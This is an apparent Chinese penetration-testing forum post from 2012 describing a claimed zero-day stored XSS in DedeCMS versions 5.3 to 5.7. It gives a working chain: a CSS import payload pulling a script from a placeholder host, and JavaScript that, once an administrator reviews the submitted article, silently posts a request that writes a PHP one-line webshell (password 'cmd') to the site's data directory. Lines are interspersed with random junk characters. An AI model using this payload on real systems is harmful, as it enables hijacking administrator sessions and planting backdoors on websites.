找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2271|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
4 M& s/ B/ D1 T9 y- h5 i为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)4 ]1 C( l7 R% \$ H1 H# V  f
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
, i: U+ [/ _2 a9 D2 H下面说说利用方法。; O, `% P  H1 o! V2 X' U8 H9 y; I1 `
条件有2个:
' E; Z/ `9 {% s2 q7 b+ w2 c/ e7 `' @* z1.开启注册
) x( ]6 U4 i- u! d# C2.开启投稿! P) V0 x; E/ p6 g0 n" o
注册会员----发表文章
/ l( u) m/ A8 F. w7 Z2 R内容填写:. r: y" ~; f2 E
复制代码
5 i, ]; P2 X$ l0 ~8 n<style>@im\port'\http://xxx.com/xss.css';</style>+ C8 F: M! P7 l
新建XSS.Css- v3 j" `9 d! Y1 K
复制代码
$ N" X* X4 {: N9 b7 i.body{
. t# X& Y! Z# jbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }8 a1 U# C4 t1 {3 Y! B
新建xss.js 内容为0 |, D3 W  u; n7 x
复制代码
- c& V$ J/ ?, `' E1.var request = false;
# e4 c. d* _. V3 y- Y* h2.if(window.XMLHttpRequest) {, H. D  ?* s8 u: K
3.request = new XMLHttpRequest();
5 r0 |1 Q+ p7 k& r0 ?4.if(request.overrideMimeType) {- R2 t' Q% t5 I+ ]
5.request.overrideMimeType('text/xml');- R+ U2 B8 W. ]* |  N
6.}" u$ T+ N8 n0 M. [+ B
7.} else if(window.ActiveXObject) {
. C1 ^3 g; D9 ?8 U. V' x8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];; i3 |3 q2 z; ^7 o( [- H$ Z
9.for(var i=0; i<versions.length; i++) {; E4 r, Z) S) B4 H! t# l1 `8 v
10.try {: o1 A' @& Y7 z+ \
11.request = new ActiveXObject(versions);! n$ r& R4 N+ Y4 k+ h
12.} catch(e) {}
  d: o# G2 n. l+ s4 q13.}2 o2 }6 J, h; \4 F5 S
14.}: x7 y) O8 _0 A+ P, v4 g; A
15.xmlhttp=request;
+ X" d  ^3 h1 l, y8 C16.function getFolder( url ){
" Z, Y. D% Q) a3 m8 w3 e/ h) J17. obj = url.split('/')
' c. y0 R  }6 K; n6 ^' \5 R18. return obj[obj.length-2]& j- c  K2 N3 a$ m/ X5 N. X- ]
19.}8 X8 p6 a9 D+ k! F- y
20.oUrl = top.location.href;
) x( f( C. r, Q21.u = getFolder(oUrl);/ J2 t' ~6 h% d5 L" ^
22.add_admin();! I9 k4 Y5 s' E& S: f
23.function add_admin(){  g' F* E+ x( T
24.var url= "/"+u+"/sys_sql_query.php";
- P" R) Q/ j) m  ~  O3 K, ~% F25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";5 L* i# K* U% X) T4 A
26.xmlhttp.open("POST", url, true);
; v9 L) ]3 c1 _- C27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
0 B6 z! c  o) B1 k28.xmlhttp.setRequestHeader("Content-length", params.length);
7 O8 R, R% Q" z0 H; S& y29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
/ A. z3 D  P% o1 q1 D& I30.xmlhttp.send(params);
3 W, D9 v. C. d31.}, O6 T: s# u9 j
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表